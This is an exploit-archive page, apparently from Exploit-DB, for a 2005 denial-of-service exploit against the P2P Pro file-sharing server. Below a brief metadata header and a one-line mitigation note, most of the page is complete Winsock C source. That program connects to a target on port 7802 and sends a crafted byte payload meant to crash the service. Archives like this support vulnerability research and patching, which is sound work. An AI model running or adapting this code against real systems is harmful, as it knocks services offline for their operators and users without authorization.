P2P Pro Command DOS Exploit

vendor:

P2P Pro

by:

Infam0us Gr0up - Securiti Research

7.5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: P2P Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:digital-revolution:p2p_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

P2P Pro Command DOS Exploit

This exploit is used to cause a denial of service (DoS) attack on the P2P Pro software. It sends a malicious packet to the target system which causes the system to crash. The malicious packet contains a string of characters which are not recognized by the system and causes it to crash.

Mitigation:

The vendor has released a patch to fix this vulnerability.

Source

Exploit-DB raw data:

/*
     P2P Pro Command DOS Exploit
 ------------------------------------
  Infam0us Gr0up - Securiti Research

 Info: infamous.2hell.com
 Vendor URL: http://www.digital-revolution.org/P2PPro.html

*/

#include string.h
#include winsock2.h 
#include stdio.h 

#pragma comment(lib, "ws2_32.lib") 

char doscore[] = 
"\x3f\x3f\xbc\x59\x70 "
"\x32\x70\x3f\xe1 "
"\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x4f\x57\x4e\x45\x44\x2e\x74"
"\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62";


int main(int argc, char *argv[]) 
{ 
WSADATA wsaData; 
WORD wVersionRequested; 
struct hostent *pTarget; 
struct sockaddr_in sock; 
char *target; 
int port,bufsize; 
SOCKET inetdos; 

if (argc < 2) 
{ 
printf("        P2P Pro Command DOS Exploit \n", argv[0]);
printf("  --------------------------------------\n", argv[0]);
printf("    Infam0us Gr0up - Securiti Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]); 
printf("[?]Exam: %s localhost 7802\n", argv[0]); 
exit(1); 
} 

wVersionRequested = MAKEWORD(1, 1); 
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; 

target = argv[1]; 
port = 7802; 

if (argc >= 3) port = atoi(argv[2]); 
bufsize = 1024; 
if (argc >= 4) bufsize = atoi(argv[3]); 

inetdos = socket(AF_INET, SOCK_STREAM, 0); 
if(inetdos==INVALID_SOCKET) 
{ 
printf("Socket ERROR \n"); 
exit(1); 
} 
printf("    P2P Pro Command DOS Exploit \n", argv[0]);
printf("  --------------------------------------\r\n\n", argv[0]);
printf("Resolve host... "); 
if ((pTarget = gethostbyname(target)) == NULL) 
{ 
printf("FAILED \n", argv[0]); 
exit(1); 
} 
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); 
sock.sin_family = AF_INET; 
sock.sin_port = htons((USHORT)port); 

printf("[+] Connecting... "); 
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) 
{ 
printf("FAILED\n"); 
exit(1); 
} 
printf("[OK]\n");
printf("Target listen.. \n"); 
printf("Sending bad procedure... "); 
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) 
{ 
printf("ERROR\n"); 
closesocket(inetdos); 
exit(1); 
} 
printf("[OK]\n ");
printf("[+] Server SHUTDOWNED!\n"); 
closesocket(inetdos); 
WSACleanup(); 
return 0; 
}

// milw0rm.com [2005-09-02]